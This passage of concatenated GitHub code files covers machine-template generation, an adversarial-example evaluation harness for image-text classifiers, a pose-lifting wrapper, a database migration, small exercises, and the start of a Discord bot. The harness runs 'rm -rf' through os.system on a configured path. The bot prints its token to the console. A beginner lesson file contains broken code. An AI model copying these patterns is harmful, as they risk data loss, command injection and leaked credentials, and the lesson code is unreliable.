can't call\n # get_key() directly, so using get_remove_key().\n ph = Plenary.get_plenary(host, logger=self.logger)\n host_key = ph.get_remove_key()\n if container:\n pc = Plenary.get_plenary(container, self.logger)\n container_key = pc.get_key()\n if not container:\n return host_key\n if not host:\n return container_key\n return CompileKey.merge([host_key, container_key])\n\n def body(self, lines):\n ram = [StructureTemplate(\"hardware/ram/generic\",\n {\"size\": PanMetric(self.dbobj.memory, \"MB\")})]\n cpus = []\n for cpu_num in range(self.dbobj.cpu_quantity):\n cpu = StructureTemplate(\"hardware/cpu/%s/%s\" %\n (self.dbobj.cpu.vendor.name,\n self.dbobj.cpu.name))\n cpus.append(cpu)\n\n disks = {}\n for disk in self.dbobj.disks:\n devname = disk.device_name\n params = {\"capacity\": PanMetric(disk.capacity, \"GB\"),\n \"interface\": disk.controller_type}\n if disk.bootable:\n params[\"boot\"] = True\n\n if disk.disk_type == 'local':\n tpl = StructureTemplate(\n (\"hardware/harddisk/generic/%s\" %\n disk.controller_type),\n params)\n\n if disk.controller_type == 'cciss':\n devname = \"cciss/\" + devname\n elif disk.disk_type == 'virtual_disk':\n share = disk.share\n\n params[\"path\"] = \"%s/%s.vmdk\" % (self.machine, disk.device_name)\n params[\"address\"] = disk.address\n params[\"sharename\"] = share.name\n params[\"server\"] = share.server\n params[\"mountpoint\"] = share.mount\n\n tpl = params\n\n disks[PanEscape(devname)] = tpl\n\n managers = {}\n interfaces = {}\n for interface in self.dbobj.interfaces:\n path = \"hardware/nic/%s/%s\" % (interface.model.vendor,\n interface.model)\n if interface.interface_type == 'public':\n ifinfo = {}\n if interface.mac:\n ifinfo[\"hwaddr\"] = interface.mac\n if interface.port_group:\n ifinfo[\"port_group\"] = interface.port_group\n if interface.bootable:\n ifinfo[\"boot\"] = interface.bootable\n interfaces[interface.name] = StructureTemplate(path, ifinfo)\n elif interface.interface_type == 'management':\n has_addr = False\n for addr in interface.assignments:\n has_addr = True\n manager = {\"hwaddr\": interface.mac}\n if addr.fqdns:\n manager[\"fqdn\"] = addr.fqdns[0]\n managers[addr.logical_name] = manager\n if not has_addr:\n managers[interface.name] = {\"hwaddr\": interface.mac}\n elif interface.interface_type == 'bonding':\n # Bonding interfaces need an entry under /hardware/cards/nic\n # only if the MAC address has been explicitely set\n if interface.mac:\n ifinfo = {\"hwaddr\": interface.mac}\n interfaces[interface.name] = StructureTemplate(path, ifinfo)\n\n # Firstly, location\n pan_assign(lines, \"location\", self.sysloc)\n pan_assign(lines, \"sysloc/building\", self.building)\n pan_assign(lines, \"sysloc/city\", self.city)\n pan_assign(lines, \"sysloc/continent\", self.continent)\n if self.rack:\n pan_assign(lines, \"rack/name\", self.rack)\n if self.rackrow:\n pan_assign(lines, \"rack/row\", self.rackrow)\n if self.rackcol:\n pan_assign(lines, \"rack/column\", self.rackcol)\n if self.room:\n pan_assign(lines, \"rack/room\", self.room)\n\n # And a chassis location?\n if self.dbobj.chassis_slot:\n slot = self.dbobj.chassis_slot[0]\n pan_assign(lines, \"chassis\", slot.chassis.fqdn)\n pan_assign(lines, \"slot\", slot.slot_number)\n\n #if self.hub:\n # pan_assign(lines, \"sysloc/hub\", self.hub)\n if self.campus:\n pan_assign(lines, \"sysloc/campus\", self.campus)\n if self.bunker:\n pan_assign(lines, \"sysloc/bunker\", self.bunker)\n if self.dns_search_domains:\n pan_assign(lines, \"sysloc/dns_search_domains\",\n 
self.dns_search_domains)\n\n # Now describe the hardware\n lines.append(\"\")\n if self.dbobj.serial_no:\n pan_assign(lines, \"serialnumber\", self.dbobj.serial_no)\n pan_assign(lines, \"nodename\", self.machine)\n pan_include(lines, \"hardware/machine/%s/%s\" %\n (self.dbobj.model.vendor.name, self.dbobj.model.name))\n\n lines.append(\"\")\n pan_assign(lines, \"ram\", ram)\n pan_assign(lines, \"cpu\", cpus)\n if disks:\n pan_assign(lines, \"harddisks\", disks)\n if interfaces:\n pan_assign(lines, \"cards/nic\", interfaces)\n\n # /hardware/console/preferred must be set, so we can't assign to\n # \"/console\" directly\n for manager in sorted(managers.keys()):\n pan_assign(lines, \"console/%s\" % manager, managers[manager])\n\n def write(self, *args, **kwargs):\n return Plenary.write(self, *args, **kwargs)\n\n\nPlenary.handlers[Machine] = PlenaryMachineInfo\n\n\ndef machine_plenary_will_move(old, new):\n \"\"\"Helper to see if updating a machine's location will move its plenary.\"\"\"\n if old.hub != new.hub or old.building != new.building or \\\n old.rack != new.rack:\n return True\n return False\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/templates/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":8404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6504233356","text":"import os\nimport json\nimport datetime\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom config import *\nimport utils as util\nimport pickle\nimport datetime\nimport time\nimport language_tool_python\nimport torchvision.transforms as transforms\n\nclass Attacker(object):\n\n def __init__(self, model, config, attack_method):\n self.model = model\n self.config = config\n self.attack_method = attack_method\n\n self.attack_name = self.config.CONFIG['attack_name']\n # self.tool = language_tool_python.LanguageTool('en-US')\n \n \n self.save_sample = False\n self.sample_log_path = config.Common['sample_log_path']\n if self.sample_log_path != '':\n if not os.path.exists(self.sample_log_path):\n os.makedirs(self.sample_log_path)\n else:\n os.system('rm -rf {}'.format(self.sample_log_path))\n os.makedirs(self.sample_log_path)\n self.save_sample = True\n\n\n def start_attack(self, dataloader):\n attack_switch = self.config.Switch_Method['method']\n log = {}\n if attack_switch == 'One_Sample_Attack':\n index = getattr(self.config, attack_switch)['index']\n for i,(image, text, label) in enumerate(dataloader):\n if (i == index):\n log = self.one_sample_attack(image, text, label)\n break\n elif attack_switch == 'Batch_Sample_Attack':\n log = self.batch_sample_attack(dataloader, **getattr(self.config, attack_switch))\n\n return log\n\n\n\n def one_sample_attack(self, image, text, label):\n log = {}\n attack_log = self.attack_method.attack(image, text, label)\n log['pre_image_data'] = image\n log['pre_text_data'] = ' '.join(text)\n log['pre_label'] = label\n log.update(attack_log)\n return log\n\n def batch_sample_attack(self, data_loader, batch): \n log = {}\n # use = util.USE('./data/aux_files')\n\n ## Record the attack performance\n success = 0 # The sample number of successful attacks\n classify_true = 0 # The sample number of successfully classified after attacks\n sample_num = 0 # The total number of samples\n\n query_number_list = [] # The query number of each attack for target model\n 
image_perturbation_rate_list = [] # The perturbation rate of the adversarial example after each attack\n text_perturbation_rate_list = [] # The perturbation rate of the adversarial example after each attack\n process_time_list = [] # The processing time for each attack\n \n perturb_image_only = 0 # The number of adversarial examples which only perturb image\n perturb_text_only = 0 # The number of adversarial examples which only perturb text\n perturb_image_and_text = 0 # The number of adversarial examples which only perturb image and text\n \n image_sim_list = []\n text_sim_list = []\n\n\n for i in range(len(data_loader)):\n text, image, label = data_loader.__getitem__(i)\n # if i == batch:\n # break\n \n starttime = datetime.datetime.now()\n one_log = self.one_sample_attack(image, text, label)\n endtime = datetime.datetime.now()\n process_time = (endtime - starttime).seconds\n process_time_list.append(process_time)\n\n\n if not one_log['classification']:\n message = 'The {:3}-th sample is not correctly classified'.format(i)\n log['print_{}'.format(i)] = message\n print(message)\n \n continue\n\n sample_num += 1\n\n query_number = one_log['query_number']\n query_number_list.append(query_number)\n \n\n\n if(one_log['status']):\n success += 1\n \n ## Record the perturbation rate\n image_perturbation_rate = one_log['image_perturbation_rate']\n image_perturbation_rate_list.append(image_perturbation_rate)\n\n text_perturbation_rate = one_log['text_perturbation_rate']\n text_perturbation_rate_list.append(text_perturbation_rate)\n \n if image_perturbation_rate != 0 and text_perturbation_rate == 0:\n perturb_image_only += 1\n elif image_perturbation_rate == 0 and text_perturbation_rate != 0:\n perturb_text_only += 1\n else:\n perturb_image_and_text += 1\n \n adv_image_sim = one_log['adv_image_sim']\n adv_text_sim = one_log['adv_text_sim']\n image_sim_list.append(adv_image_sim)\n text_sim_list.append(adv_text_sim)\n \n \n if self.save_sample:\n adv_image = transforms.ToPILImage()(one_log['adv_image'])\n ori_image = transforms.ToPILImage()(image)\n adv_image.save(os.path.join(self.sample_log_path, '{}_adv.png'.format(i)))\n ori_image.save(os.path.join(self.sample_log_path, '{}_ori.png'.format(i)))\n adv_text = one_log['adv_text']\n ori_text = ' '.join(text)\n adv_label = one_log['adv_label']\n with open(os.path.join(self.sample_log_path, '{}_text.txt'.format(i)), 'w') as f:\n f.write('ori_text:\\t{}\\n'.format(ori_text))\n f.write('adv_text:\\t{}\\n'.format(adv_text))\n f.write('ori_label:\\t{}\\n'.format(str(label)))\n f.write('adv_label:\\t{}\\n'.format(str(adv_label)))\n f.write('\\n')\n f.write('image_perturbation_rate:\\t{}\\n'.format(str(image_perturbation_rate)))\n f.write('text_perturbation_rate:\\t{}\\n'.format(str(text_perturbation_rate)))\n f.write('\\n')\n f.write('adv_image_sim:\\t{}\\n'.format(str(adv_image_sim)))\n f.write('adv_text_sim:\\t{}\\n'.format(str(adv_text_sim)))\n \n\n message = 'The {:3}-th sample takes {:3}s, with the image perturbation rate: {:.5}, text perturbation rate {:.5}, semantic similarity: {:.5}, query number: {:4}. 
Attack succeeds.'.format(i, process_time, image_perturbation_rate, text_perturbation_rate, 0.0, query_number)\n print(message)\n else:\n classify_true += 1\n message = 'The {:3}-th sample takes {:3}s, Attack fails'.format(i, process_time)\n print(message)\n \n log['print_{}'.format(i)] = message\n \n message = '\\nA total of {:4} samples were selected, {:3} samples were correctly classified, {:3} samples were attacked successfully and {:4} samples failed'.format(batch, sample_num, success, sample_num - success)\n print(message)\n log['print_last'] = message\n\n\n acc = sample_num/batch # The classification accuracy of target model\n attack_acc = classify_true/batch # The classification accuracy of target model after attack\n success_rate = success/sample_num # The attack success rate of attack method\n average_image_perturbation_rate = np.mean(image_perturbation_rate_list).item() # The average perturbation rate of the adversarial example\n average_text_perturbation_rate = np.mean(text_perturbation_rate_list).item() # The average perturbation rate of the adversarial example\n # average_sim = np.mean(sim_list).item() # The average semantic similarity of the adversarial example\n average_image_sim = np.mean(image_sim_list).item()\n average_text_sim = np.mean(text_sim_list).item()\n\n average_query_number = np.mean(query_number_list).item() # The average query number of each attack\n average_process_time = np.mean(process_time_list).item() # The average process time of each attack\n \n\n log['acc'] = acc\n log['after_attack_acc'] = attack_acc\n log['attack_success_rate'] = success_rate\n log['average_image_perturbation_rate'] = average_image_perturbation_rate\n log['average_text_perturbation_rate'] = average_text_perturbation_rate\n \n log['perturb_image_only'] = perturb_image_only/max(1, success)\n log['perturb_text_only'] = perturb_text_only/max(1, success)\n log['perturb_image_and_text'] = perturb_image_and_text/max(1, success)\n \n log['adv_image_sim'] = average_image_sim\n log['adv_text_sim'] = average_text_sim\n\n log['average_query_number'] = average_query_number\n log['average_process_time'] = average_process_time\n \n return log\n\n ","repo_name":"JHL-HUST/SparseMA","sub_path":"user/attacker.py","file_name":"attacker.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42104589128","text":"#Двмерный массив\n'''\ndef show_matrix(matrix):\n for row in matrix: # запускает цикл каждый раз и у нас получается каждая строка\n for x in row: # выводит строку\n print(x, end=\" \")\n print()\n\nm = [[1, 2, 3], [2, 3, 4], [3, 4, 5]]\n\n\nshow_matrix(m)\n\n# print(m)\n# print(m[0])\n# print(m[0][1])\n'''\n\nimport random\n\ndef init_matrix(matrix, min_n, max_n):\n for i in range(len(matrix)):\n for j in range(len(len(matrix[0]))):\n matrix[i][j] = random.randint(min_n, max_n)\n\n\ndef show_matrix(matrix):\n for row in matrix:\n for x in row:\n print(x, end=\" \")\n print()\n\nn = 10\na = [[0]* n for i in range(n)]\n\ninit_matrix(a, 1, 101)\n\nshow_matrix(ф)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Oleg0079912/progr.1299.student","sub_path":"lessons_hillel/Lesson_3 (Двмерный массив).py","file_name":"Lesson_3 (Двмерный массив).py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32675528435","text":"from pose_pipeline import MODEL_DATA_DIR, TopDownPerson\nfrom pose_pipeline.env import add_path\nfrom 
dataclasses import dataclass\nfrom tqdm import tqdm\nimport numpy as np\nimport os\n\n\n@dataclass\nclass RIEArgs:\n causal: bool = False\n architecture: str = \"3,3,3,3,3\"\n dropout: float = 0.2\n channels: int = 256\n latent_features_dim: int = 512\n dense: bool = False\n stage: int = 1\n\n\ndef process_rie(key, batch_size=32, transform_coco=False):\n\n keypoints = (TopDownPerson & key).fetch1(\"keypoints\")\n N = keypoints.shape[0]\n\n if transform_coco:\n with add_path(os.environ[\"GAST_PATH\"]):\n from tools.preprocess import h36m_coco_format, revise_kpts\n\n keypoints_reformat, keypoints_score = keypoints[None, ..., :2], keypoints[None, ..., 2]\n keypoints_reformat, scores, valid_frames = h36m_coco_format(keypoints_reformat, keypoints_score)\n keypoints_reformat = revise_kpts(keypoints_reformat, scores, valid_frames)[0]\n\n valid_frames = np.array(valid_frames[0])\n keypoints = keypoints_reformat[valid_frames]\n\n else:\n valid_frames = np.arange(keypoints.shape[0])\n\n with add_path(os.environ[\"RIE_PATH\"]):\n\n import torch\n from common.generators import Evaluate_Generator\n from common.skeleton import Skeleton\n from common.model import RIEModel\n\n skeleton = Skeleton(\n parents=[\n -1,\n 0,\n 1,\n 2,\n 3,\n 4,\n 0,\n 6,\n 7,\n 8,\n 9,\n 0,\n 11,\n 12,\n 13,\n 14,\n 12,\n 16,\n 17,\n 18,\n 19,\n 20,\n 19,\n 22,\n 12,\n 24,\n 25,\n 26,\n 27,\n 28,\n 27,\n 30,\n ],\n joints_left=[6, 7, 8, 9, 10, 16, 17, 18, 19, 20, 21, 22, 23],\n joints_right=[1, 2, 3, 4, 5, 24, 25, 26, 27, 28, 29, 30, 31],\n )\n\n args = RIEArgs()\n\n filter_widths = [int(x) for x in args.architecture.split(\",\")]\n\n model_pos = RIEModel(\n 17,\n 2,\n skeleton.num_joints(),\n filter_widths=filter_widths,\n causal=args.causal,\n dropout=args.dropout,\n channels=args.channels,\n latten_features=args.latent_features_dim,\n dense=args.dense,\n is_train=False,\n Optimize1f=True,\n stage=args.stage,\n )\n\n checkpoint = os.path.join(MODEL_DATA_DIR, \"rie/cpn_pretrained.bin\")\n checkpoint_p = torch.load(checkpoint, map_location=lambda storage, loc: storage)\n\n pretrain_dict = checkpoint_p[\"model_pos\"]\n temp = pretrain_dict.items()\n model_dict = model_pos.state_dict()\n state_dict = {k: v for k, v in pretrain_dict.items() if k in model_dict.keys()}\n state_dict = {k: v for i, (k, v) in enumerate(state_dict.items()) if i < 317}\n\n model_dict.update(state_dict)\n model_pos.load_state_dict(model_dict)\n\n with torch.no_grad():\n model_pos.eval()\n\n receptive_field = model_pos.receptive_field()\n pad = (receptive_field - 1) // 2 # Padding on each side\n causal_shift = pad if args.causal else 0\n\n gen = Evaluate_Generator(\n batch_size=batch_size,\n cameras=None,\n poses_3d=None,\n poses_2d=[keypoints[:, :, :2]],\n chunk_length=1,\n shuffle=False,\n pad=pad,\n causal_shift=causal_shift,\n )\n\n results = []\n with torch.no_grad():\n for sample in tqdm(gen.next_epoch()):\n sample = sample[2]\n sample = torch.from_numpy(sample.astype(\"float32\")).contiguous()\n out = model_pos(sample)\n\n results.append(out.detach().cpu().numpy()[:, 0, ...])\n results = np.concatenate(results, axis=0) / 1000.0\n\n keypoints_3d = np.zeros((N, 17, 3))\n keypoints_3d[valid_frames] = results\n keypoints_valid = [i in valid_frames.tolist() for i in np.arange(keypoints.shape[0])]\n\n return {\"keypoints_3d\": keypoints_3d, \"keypoints_valid\": 
keypoints_valid}\n","repo_name":"peabody124/PosePipeline","sub_path":"pose_pipeline/wrappers/rie_lifting.py","file_name":"rie_lifting.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"61"} +{"seq_id":"34061962503","text":"\"\"\"postgres: Initialize imdb tables\n\nRevision ID: 5573c1201da3\nRevises: a7c0de3cdadd\nCreate Date: 2023-06-04 12:38:09.958297\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5573c1201da3'\ndown_revision = 'a7c0de3cdadd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade(engine_name: str) -> None:\n globals()[\"upgrade_%s\" % engine_name]()\n\n\ndef downgrade(engine_name: str) -> None:\n globals()[\"downgrade_%s\" % engine_name]()\n\n\ndef upgrade_postgresql() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n 'name_basics',\n sa.Column('nconst', sa.String(length=256), nullable=False),\n sa.Column('primary_name', sa.String(length=256), nullable=True),\n sa.Column('birth_year', sa.String(length=256), nullable=True),\n sa.Column('death_year', sa.String(length=256), nullable=True),\n sa.Column('primary_profession', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('known_for_titles', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('nconst')\n )\n op.create_table(\n 'title_akas',\n sa.Column('title_id', sa.String(length=256), nullable=False),\n sa.Column('ordering', sa.Integer(), nullable=True),\n sa.Column('title', sa.String(length=256), nullable=True),\n sa.Column('region', sa.String(length=256), nullable=True),\n sa.Column('language', sa.String(length=256), nullable=True),\n sa.Column('types', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('attributes', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('is_original_title', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('title_id', 'ordering')\n )\n op.create_table(\n 'title_basics',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('title_type', sa.String(length=256), nullable=True),\n sa.Column('primary_title', sa.String(length=256), nullable=True),\n sa.Column('original_title', sa.String(length=256), nullable=True),\n sa.Column('is_adult', sa.Boolean(), nullable=True),\n sa.Column('start_year', sa.Integer(), nullable=True),\n sa.Column('end_year', sa.Integer(), nullable=True),\n sa.Column('runtime_minutes', sa.Integer(), nullable=True),\n sa.Column('genres', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_crew',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('directors', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.Column('writers', sa.ARRAY(sa.String(length=256)), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_episode',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('parent_tconst', sa.String(length=256), nullable=True),\n sa.Column('season_number', sa.Integer(), nullable=True),\n sa.Column('episode_number', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n op.create_table(\n 'title_principals',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('ordering', sa.Integer(), nullable=True),\n sa.Column('nconst', sa.String(length=256), nullable=True),\n sa.Column('category', sa.String(length=256), 
nullable=True),\n sa.Column('job', sa.String(length=512), nullable=True),\n sa.Column('characters', sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint('tconst', 'ordering'),\n )\n op.create_table(\n 'title_ratings',\n sa.Column('tconst', sa.String(length=256), nullable=False),\n sa.Column('average_rating', sa.Float(), nullable=True),\n sa.Column('num_votes', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('tconst')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade_postgresql() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('title_ratings')\n op.drop_table('title_principals')\n op.drop_table('title_episode')\n op.drop_table('title_crew')\n op.drop_table('title_basics')\n op.drop_table('title_akas')\n op.drop_table('name_basics')\n # ### end Alembic commands ###\n\n\ndef upgrade_clickhouse() -> None:\n pass\n\n\ndef downgrade_clickhouse() -> None:\n pass\n","repo_name":"tmolcard/col-row-db","sub_path":"alembic/versions/5573c1201da3_postgres_initialize_imdb_tables.py","file_name":"5573c1201da3_postgres_initialize_imdb_tables.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6660091889","text":"import pandas as pd\nimport os, math\n\ndef read_TS(file = '/Users/steve/doe-project/reductive_reconstruction/oxide_tests/structures/pt/coupled_1.0/chg.0.lmp'):\n # read in the data file for a given timestep and convert to a dataframe\n input = open(file, 'r')\n raw_data = input.readlines()\n input.close()\n\n timestep = int(raw_data[1])\n ts_data = {'ID':[], 'Type':[], 'X':[], 'Y':[], 'Z':[], 'Q':[]}\n\n for line in raw_data[9:]:\n ld = line.split()\n #print(ld)\n ts_data['ID'].append(int(ld[0]))\n ts_data['Type'].append(int(ld[1]))\n ts_data['X'].append(float(ld[2])*33.262)\n ts_data['Y'].append(float(ld[3])*33.607)\n ts_data['Z'].append(float(ld[4])*128.632)\n ts_data['Q'].append(float(ld[5]))\n\n run_data = pd.DataFrame.from_dict(ts_data)\n run_data = run_data.sort_values(by=['ID'])\n\n return timestep, run_data\n\ndef seperate_layer(data: pd.DataFrame, types: list, zmin: float, zmax: float):\n # data = pd.Dataframe, types = list of atom ids to include, zmin/zmax = range of values for the layer\n layer = data[(data['Type'].isin(types)) & (data['Z'] > zmin) & (data['Z'] < zmax)]\n numAtoms = len(layer.ID)\n totalQ = layer['Q'].sum()\n avgQ = totalQ / numAtoms\n minQ = layer['Q'].min()\n maxQ = layer['Q'].max()\n return totalQ, avgQ, maxQ, minQ, numAtoms\n\n","repo_name":"stephen-holoviak/MD_scripts","sub_path":"read_timeStep.py","file_name":"read_timeStep.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3442149797","text":"import os\nimport sys\nimport argparse\nimport re\nimport json\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='')\n\n parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')\n parser.add_argument('-i', '--input_path', required=True, help='input path')\n parser.add_argument('-o', '--output_path', required=True, help='input path')\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n with open(args.output_path + '.txt', 'w') as f, open(args.output_path + '.hash', 'w') as f2:\n\n\n json_re = re.compile(r'(.*?)\\.json')\n if os.path.isdir(args.input_path):\n for root, dirs, files in os.walk(args.input_path):\n for file in 
files:\n                    file_path = os.path.join(root, file)\n                    match = re.match(json_re, file)\n                    if not match:\n                        continue\n                    hash_id = match.group(1)\n\n                    with open(file_path, 'r') as json_f:\n                        data_dict = json.load(json_f)\n                        f.write(data_dict['text'] + '\\n')\n                        f2.write(hash_id + '\\n')\n\n        else:\n            # derive the hash id from the input file name (a single file has no per-record hash);\n            # this fallback mirrors the directory branch above\n            match = re.match(json_re, os.path.basename(args.input_path))\n            hash_id = match.group(1) if match else os.path.basename(args.input_path)\n            with open(args.input_path, 'r') as json_f:\n                for line in json_f:\n                    data_dict = json.loads(line)\n                    f.write(data_dict['text'] + '\\n')\n                    f2.write(hash_id + '\\n')\n\n    return 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"cenetp/hack4oer2018_lehrplaene","sub_path":"convert_json_for_translate.py","file_name":"convert_json_for_translate.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72349247555","text":"# I know that adding \"test\" to the filename to test it is bad practice\n# I'm not a Python programmer!\n\ndef contains(string1, string2):\n    \"\"\"\n    Returns True if string1 contains string2\n    \"\"\"\n\n    if string2 in string1:\n        # string2 is in string1! Return True to signify that we found it\n        return True\n    else:\n        # string2 is not in string1, so we return False\n        return False\n    \ndef test_contains():\n    assert contains(\"banana\", \"ana\") == True\n    assert contains(\"racecar\", \"car\") == True\n    \n    assert contains(\"cool\", \"test\") == False\n    assert contains(\"hello\", \"hi\") == False","repo_name":"SkyfallWasTaken/cs-hw","sub_path":"string_contains_test.py","file_name":"string_contains_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11216233660","text":"#\n# [412] Fizz Buzz\n#\n# https://leetcode.com/problems/fizz-buzz/description/\n#\n# algorithms\n# Easy (58.19%)\n# Total Accepted:    107.7K\n# Total Submissions: 185.1K\n# Testcase Example:  '1'\n#\n# Write a program that outputs the string representation of numbers from 1 to\n# n.\n# \n# But for multiples of three it should output “Fizz” instead of the number and\n# for the multiples of five output “Buzz”. 
For numbers which are multiples of\n# both three and five output “FizzBuzz”.\n# \n# Example:\n# \n# n = 15,\n# \n# Return:\n# [\n# ⁠   \"1\",\n# ⁠   \"2\",\n# ⁠   \"Fizz\",\n# ⁠   \"4\",\n# ⁠   \"Buzz\",\n# ⁠   \"Fizz\",\n# ⁠   \"7\",\n# ⁠   \"8\",\n# ⁠   \"Fizz\",\n# ⁠   \"Buzz\",\n# ⁠   \"11\",\n# ⁠   \"Fizz\",\n# ⁠   \"13\",\n# ⁠   \"14\",\n# ⁠   \"FizzBuzz\"\n# ]\n# \n# \n#\nclass Solution(object):\n    def fizzBuzz(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: List[str]\n        \"\"\"\n        rs = []\n        for i in range(1, n+1):\n            if i % 3 == 0 and i % 5 == 0:\n                rs.append(\"FizzBuzz\")\n            elif i % 3 == 0:\n                rs.append(\"Fizz\")\n            elif i % 5 == 0:\n                rs.append(\"Buzz\")\n            else:\n                rs.append(str(i))\n        return rs\n        \n","repo_name":"goalong/lc","sub_path":"v1/412.fizz-buzz.136736605.ac.py","file_name":"412.fizz-buzz.136736605.ac.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"19171333001","text":"import discord\r\nfrom discord.ext import tasks\r\nfrom datetime import datetime as dt\r\nimport datetime\r\nimport re\r\nimport json\r\nimport pickle\r\n\r\nuser = []\r\nremember = []\r\ntimeL = []\r\ndate = []\r\n\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\nclient = discord.Client(intents=intents)\r\n\r\n#get saved data from files to variables\r\nwith open('channelid.txt', 'r') as f:\r\n    cid = int(f.read())\r\ntry:\r\n    with open(\"user.pickle\", \"rb\") as fu:\r\n        user = pickle.load(fu)\r\nexcept:\r\n    with open(\"user.pickle\", \"wb\") as fu:\r\n        print(\"user.pickle not found, creating file...\")\r\ntry:\r\n    with open(\"remember.pickle\", \"rb\") as fr:\r\n        remember = pickle.load(fr)\r\nexcept:\r\n    with open(\"remember.pickle\", \"wb\") as fr:\r\n        print(\"remember.pickle not found, creating file...\")\r\ntry:\r\n    with open(\"timeL.pickle\", \"rb\") as ft:\r\n        timeL = pickle.load(ft)\r\nexcept:\r\n    with open(\"timeL.pickle\", \"wb\") as ft:\r\n        print(\"timeL.pickle not found, creating file...\")\r\ntry:\r\n    with open(\"date.pickle\", \"rb\") as fd:\r\n        date = pickle.load(fd)\r\nexcept:\r\n    with open(\"date.pickle\", \"wb\") as fd:\r\n        print(\"date.pickle not found, creating file...\")\r\ntry:\r\n    with open('config.json') as f:\r\n        data = json.load(f)\r\n        for c in data['botConfig']:\r\n            print('Prefix: ' + c['prefix'])\r\n            print('Token: ' + c['token'])\r\nexcept:\r\n    print(\"config file not found!\")\r\n    exit()\r\nprint(f\"channel id saved: {str(cid)}\")\r\n\r\n#save data to files (the file names must match the .pickle files loaded above)\r\ndef updateFile():\r\n    with open(\"user.pickle\", \"wb\") as fu:  # Pickling\r\n        pickle.dump(user, fu)\r\n    with open(\"remember.pickle\", \"wb\") as fr:  # Pickling\r\n        pickle.dump(remember, fr)\r\n    with open(\"timeL.pickle\", \"wb\") as ft:  # Pickling\r\n        pickle.dump(timeL, ft)\r\n    with open(\"date.pickle\", \"wb\") as fd:  # Pickling\r\n        pickle.dump(date, fd)\r\n\r\n#convert HHam/pm time to HH:MM\r\ndef HHtoHHMM(time):\r\n    if time == \"12am\":\r\n        return \"00:00\"\r\n    elif time == \"1am\":\r\n        return \"01:00\"\r\n    elif time == \"2am\":\r\n        return \"02:00\"\r\n    elif time == \"3am\":\r\n        return \"03:00\"\r\n    elif time == \"4am\":\r\n        return \"04:00\"\r\n    elif time == \"5am\":\r\n        return \"05:00\"\r\n    elif time == \"6am\":\r\n        return \"06:00\"\r\n    elif time == \"7am\":\r\n        return \"07:00\"\r\n    elif time == \"8am\":\r\n        return \"08:00\"\r\n    elif time == \"9am\":\r\n        return \"09:00\"\r\n    elif time == \"10am\":\r\n        return \"10:00\"\r\n    elif time == \"11am\":\r\n        return \"11:00\"\r\n    elif time == \"12pm\":\r\n        return \"12:00\"\r\n    elif time == \"1pm\":\r\n        return 
